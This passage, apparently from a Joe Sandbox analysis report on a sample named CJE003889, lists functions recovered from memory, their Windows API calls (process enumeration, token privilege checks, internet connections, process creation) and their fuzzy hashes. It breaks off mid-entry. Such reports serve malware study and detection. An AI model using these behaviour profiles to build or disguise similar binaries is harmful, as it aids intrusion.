                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: 3a9040ba8118d0f6b27f5c9fc80a4f29a461c79790376d00ec4f6d9f2089a948
                                                          • Instruction ID: e491c198e6ea7bab0508b4ae66257ebece45dc16058783b11e963f966276fa2a
                                                          • Opcode Fuzzy Hash: 3a9040ba8118d0f6b27f5c9fc80a4f29a461c79790376d00ec4f6d9f2089a948
                                                          • Instruction Fuzzy Hash: 6C31BA311083859FD314EF20D8C1FAFBBE8AF95354F50492CF492861A1EB719A4ACB92
                                                          APIs
                                                            • Part of subcall function 00C62612: GetWindowLongW.USER32(?,000000EB), ref: 00C62623
                                                          • GetCursorPos.USER32(?), ref: 00CEC4D2
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C9B9AB,?,?,?,?,?), ref: 00CEC4E7
                                                          • GetCursorPos.USER32(?), ref: 00CEC534
                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C9B9AB,?,?,?), ref: 00CEC56E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                          • String ID:
                                                          • API String ID: 2864067406-0
                                                          • Opcode ID: 75caac818a84529613529d87d235ac541eb1b95b986d060e63b9d18c26dae286
                                                          • Instruction ID: e83bc402c7ddf95a94b3bb69c243a956cefe69fea6c04c9e0b5fa63c8a549819
                                                          • Opcode Fuzzy Hash: 75caac818a84529613529d87d235ac541eb1b95b986d060e63b9d18c26dae286
                                                          • Instruction Fuzzy Hash: 1431A535501498AFCB25CF99D8D8EFE7BB5EB09310F044069F9158B261C731AE52EFA4
                                                          APIs
                                                            • Part of subcall function 00CB810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00CB8121
                                                            • Part of subcall function 00CB810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00CB812B
                                                            • Part of subcall function 00CB810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CB813A
                                                            • Part of subcall function 00CB810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00CB8141
                                                            • Part of subcall function 00CB810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CB8157
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00CB86A3
                                                          • _memcmp.LIBCMT ref: 00CB86C6
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CB86FC
                                                          • HeapFree.KERNEL32(00000000), ref: 00CB8703
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                          • String ID:
                                                          • API String ID: 1592001646-0
                                                          • Opcode ID: 3d0697c902e7e3276bcfaa67b1521222d4d0f8daf35a1ab74b243a8f6511b4c3
                                                          • Instruction ID: a5210c226aec89a74054a6597c0368143d2965334c13d992463ef0c42faf5855
                                                          • Opcode Fuzzy Hash: 3d0697c902e7e3276bcfaa67b1521222d4d0f8daf35a1ab74b243a8f6511b4c3
                                                          • Instruction Fuzzy Hash: 5E218C71E01208EFDF10DFA8C949BEEB7B8EF45304F158059E854AB240DB30AE0ADB90
                                                          APIs
                                                          • __setmode.LIBCMT ref: 00C809AE
                                                            • Part of subcall function 00C65A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CC7896,?,?,00000000), ref: 00C65A2C
                                                            • Part of subcall function 00C65A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CC7896,?,?,00000000,?,?), ref: 00C65A50
                                                          • _fprintf.LIBCMT ref: 00C809E5
                                                          • OutputDebugStringW.KERNEL32(?), ref: 00CB5DBB
                                                            • Part of subcall function 00C84AAA: _flsall.LIBCMT ref: 00C84AC3
                                                          • __setmode.LIBCMT ref: 00C80A1A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                          • String ID:
                                                          • API String ID: 521402451-0
                                                          • Opcode ID: 6f766a96906d88b0802b941e382d8dbf8fb49b055f7a89cbadf96bbdc39fa3df
                                                          • Instruction ID: c7ca784bbd7f617cb03c61faa432483316de06828a981ae640a91a11474d035e
                                                          • Opcode Fuzzy Hash: 6f766a96906d88b0802b941e382d8dbf8fb49b055f7a89cbadf96bbdc39fa3df
                                                          • Instruction Fuzzy Hash: 02113671904245AFDB18B3B49C86EFE77A8DF45324F340159F205971C3EE305946B7A9
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CD17A3
                                                            • Part of subcall function 00CD182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CD184C
                                                            • Part of subcall function 00CD182D: InternetCloseHandle.WININET(00000000), ref: 00CD18E9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Internet$CloseConnectHandleOpen
                                                          • String ID:
                                                          • API String ID: 1463438336-0
                                                          • Opcode ID: 81989420bdd391e853fae4199a22033c4db9058649408eee9b9f0529d470a45f
                                                          • Instruction ID: d4827b15c2ed40c1586e23e7ae3e04d65ba637cc5907c6fd2ee1b7b1a61a6660
                                                          • Opcode Fuzzy Hash: 81989420bdd391e853fae4199a22033c4db9058649408eee9b9f0529d470a45f
                                                          • Instruction Fuzzy Hash: 14218E72200605BFEB129F609C41BBBBBA9FB88710F19402BFE1196791DB719911A7A0
                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(?,00CEFAC0), ref: 00CC3A64
                                                          • GetLastError.KERNEL32 ref: 00CC3A73
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CC3A82
                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00CEFAC0), ref: 00CC3ADF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                          • String ID:
                                                          • API String ID: 2267087916-0
                                                          • Opcode ID: d4767bfb64bd3d4033b06ac21c449279eeb4e0b66885347ecd4e50cbadbc9151
                                                          • Instruction ID: faaecd8e8ae2aada03af60e07c5d69f357b160bb07cffc9ae7e26b6497c6b0b6
                                                          • Opcode Fuzzy Hash: d4767bfb64bd3d4033b06ac21c449279eeb4e0b66885347ecd4e50cbadbc9151
                                                          • Instruction Fuzzy Hash: AA21D3705082419F8310EF68D881E6A77E4AE59364F108A2DF4E9CB2A1DB31DE16DB92
                                                          APIs
                                                            • Part of subcall function 00CBF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00CBDCD3,?,?,?,00CBEAC6,00000000,000000EF,00000119,?,?), ref: 00CBF0CB
                                                            • Part of subcall function 00CBF0BC: lstrcpyW.KERNEL32(00000000,?,?,00CBDCD3,?,?,?,00CBEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00CBF0F1
                                                            • Part of subcall function 00CBF0BC: lstrcmpiW.KERNEL32(00000000,?,00CBDCD3,?,?,?,00CBEAC6,00000000,000000EF,00000119,?,?), ref: 00CBF122
                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00CBEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00CBDCEC
                                                          • lstrcpyW.KERNEL32(00000000,?,?,00CBEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00CBDD12
                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00CBEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00CBDD46
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: lstrcmpilstrcpylstrlen
                                                          • String ID: cdecl
                                                          • API String ID: 4031866154-3896280584
                                                          • Opcode ID: 551f2f876fea6a327a31918eecf0b62b26191a0bfcbe505f0dd1ff4eb1325fb0
                                                          • Instruction ID: 19e0b7680be9b2232fc9c750f3a289936fb0f5406469dbc5b780bb7a93cdaaae
                                                          • Opcode Fuzzy Hash: 551f2f876fea6a327a31918eecf0b62b26191a0bfcbe505f0dd1ff4eb1325fb0
                                                          • Instruction Fuzzy Hash: 5411BB3A200305EBCB25AF74DC45ABE77A8FF45310F40802AF856CB2A0FB719941D7A4
                                                          APIs
                                                          • _free.LIBCMT ref: 00C95101
                                                            • Part of subcall function 00C8571C: __FF_MSGBANNER.LIBCMT ref: 00C85733
                                                            • Part of subcall function 00C8571C: __NMSG_WRITE.LIBCMT ref: 00C8573A
                                                            • Part of subcall function 00C8571C: RtlAllocateHeap.NTDLL(00F80000,00000000,00000001,00000000,?,?,?,00C80DD3,?), ref: 00C8575F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          • Opcode ID: 73fddb7de2c4e47d310322a2dc9bdbc76d0b41ed3de5fa74ee048134996bdde2
                                                          • Instruction ID: cf4a5ce3eebd4ec6c74a0622c9daf19fb5b95b0a28f20ab8533031bbe8dc2e9b
                                                          • Opcode Fuzzy Hash: 73fddb7de2c4e47d310322a2dc9bdbc76d0b41ed3de5fa74ee048134996bdde2
                                                          • Instruction Fuzzy Hash: D4112972500A11AFCF333F70AC4D76D3B989F50365B10452EF9549A260DF30CE42A798
                                                          APIs
                                                            • Part of subcall function 00C65A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CC7896,?,?,00000000), ref: 00C65A2C
                                                            • Part of subcall function 00C65A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CC7896,?,?,00000000,?,?), ref: 00C65A50
                                                          • gethostbyname.WSOCK32(?,?,?), ref: 00CD6399
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00CD63A4
                                                          • _memmove.LIBCMT ref: 00CD63D1
                                                          • inet_ntoa.WSOCK32(?), ref: 00CD63DC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                          • String ID:
                                                          • API String ID: 1504782959-0
                                                          • Opcode ID: d1a00e77792aeb74ab15cc80ee933342cff68780fc8a7057f71ae8fc4886f57a
                                                          • Instruction ID: ef59175df2694b7a051987e8bd32e881b708585f81b8b8d8b75ef6e269101076
                                                          • Opcode Fuzzy Hash: d1a00e77792aeb74ab15cc80ee933342cff68780fc8a7057f71ae8fc4886f57a
                                                          • Instruction Fuzzy Hash: 32116032500109AFCB10FBE4DD86DEEB7B8EF09310B144169F605A72A2DB31AE15EB61
                                                          APIs
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00CB8B61
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CB8B73
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CB8B89
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CB8BA4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 5de41a997f1e36b761729fb3c206eb54879ea62fd84a992a050927a3fe06d61b
                                                          • Instruction ID: 7ce157fecfc4001ddd9a1104699c5bf02ed1cc6f5302bedefaeb15a9938f0b27
                                                          • Opcode Fuzzy Hash: 5de41a997f1e36b761729fb3c206eb54879ea62fd84a992a050927a3fe06d61b
                                                          • Instruction Fuzzy Hash: 45110A79901218FFDB11DBA5CC85F9DBB78EB48710F204095E910B7250DA716E15DB94
                                                          APIs
                                                            • Part of subcall function 00C62612: GetWindowLongW.USER32(?,000000EB), ref: 00C62623
                                                          • DefDlgProcW.USER32(?,00000020,?), ref: 00C612D8
                                                          • GetClientRect.USER32(?,?), ref: 00C9B5FB
                                                          • GetCursorPos.USER32(?), ref: 00C9B605
                                                          • ScreenToClient.USER32(?,?), ref: 00C9B610
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                          • String ID:
                                                          • API String ID: 4127811313-0
                                                          • Opcode ID: 83b43327e95461f525dbb8e3d64ec9c35e5cd09a11ff30bd3eb043165a1cfcbd
                                                          • Instruction ID: 65912733022456f2d32409eecdc3716b8cb5ad028746655c80a52265dda738d5
                                                          • Opcode Fuzzy Hash: 83b43327e95461f525dbb8e3d64ec9c35e5cd09a11ff30bd3eb043165a1cfcbd
                                                          • Instruction Fuzzy Hash: 20115835901459AFCB20DF99D8D9ABE77B8EB05301F040455FA01E7240C730BA529BA5
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CBFCED,?,00CC0D40,?,00008000), ref: 00CC115F
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00CBFCED,?,00CC0D40,?,00008000), ref: 00CC1184
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CBFCED,?,00CC0D40,?,00008000), ref: 00CC118E
                                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,00CBFCED,?,00CC0D40,?,00008000), ref: 00CC11C1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CounterPerformanceQuerySleep
                                                          • String ID:
                                                          • API String ID: 2875609808-0
                                                          • Opcode ID: ea57552197cf39ec9a494a5f4008bb29120bc3336fa32a00cdc568b631c0da7b
                                                          • Instruction ID: bc5de0e45e3958848795e5b4305a57fbef3f35c889a6916906174f5c46e85ccd
                                                          • Opcode Fuzzy Hash: ea57552197cf39ec9a494a5f4008bb29120bc3336fa32a00cdc568b631c0da7b
                                                          • Instruction Fuzzy Hash: DF113C31D0061DEBCF009FA6D898BEEBB78FF0A711F094059EE41B6241CB749691CBA5
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00CBD84D
                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00CBD864
                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00CBD879
                                                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00CBD897
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                          • String ID:
                                                          • API String ID: 1352324309-0
                                                          • Opcode ID: 9098db1dc21503bfbaafca84a9252dfb090ba217e6218c8cf35da71cab4cf30e
                                                          • Instruction ID: 4c204b2b479701265dfc03d245187c1fcaa024f3d44d320e5a4595107006a99a
                                                          • Opcode Fuzzy Hash: 9098db1dc21503bfbaafca84a9252dfb090ba217e6218c8cf35da71cab4cf30e
                                                          • Instruction Fuzzy Hash: D5115E75605704DBE3208F51EC48F96BBBCEB00B01F10856DA516D6090E7B2E649DBE1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction ID: 47013248a3f8f6cbbdaf640a90b0109b82d0f2f081fc843b01cd407d9125d855
                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction Fuzzy Hash: E6018C3205A14ABBCF125F84CC4ACEE3F62BB18350F488615FE2858430C236CAB1AB81
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 00CEB2E4
                                                          • ScreenToClient.USER32(?,?), ref: 00CEB2FC
                                                          • ScreenToClient.USER32(?,?), ref: 00CEB320
                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CEB33B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                          • String ID:
                                                          • API String ID: 357397906-0
                                                          • Opcode ID: ba1608767771362e1550280c19aca8439394610c1e75ac0cef7ba7e5066142e0
                                                          • Instruction ID: 1eee888a4b33dd29dfff5bf10491a78ad1721641e76235f1eee9e81ef5f79e5c
                                                          • Opcode Fuzzy Hash: ba1608767771362e1550280c19aca8439394610c1e75ac0cef7ba7e5066142e0
                                                          • Instruction Fuzzy Hash: 481143B9D00249EFDB41CFA9D884AEEFBB9FB08310F108166E914E3220D735AA558F50
                                                          APIs
                                                          • _memset.LIBCMT ref: 00CEB644
                                                          • _memset.LIBCMT ref: 00CEB653
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D26F20,00D26F64), ref: 00CEB682
                                                          • CloseHandle.KERNEL32 ref: 00CEB694
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseCreateHandleProcess
                                                          • String ID:
                                                          • API String ID: 3277943733-0
                                                          • Opcode ID: 6d040088b9a98154605205d37a74f34877f324e46606264a9bb241f69a81266e
                                                          • Instruction ID: 498d4edcda2e2959ca02b67a424d88791149718cbdfd5f3b5684468ce1d5e7ab
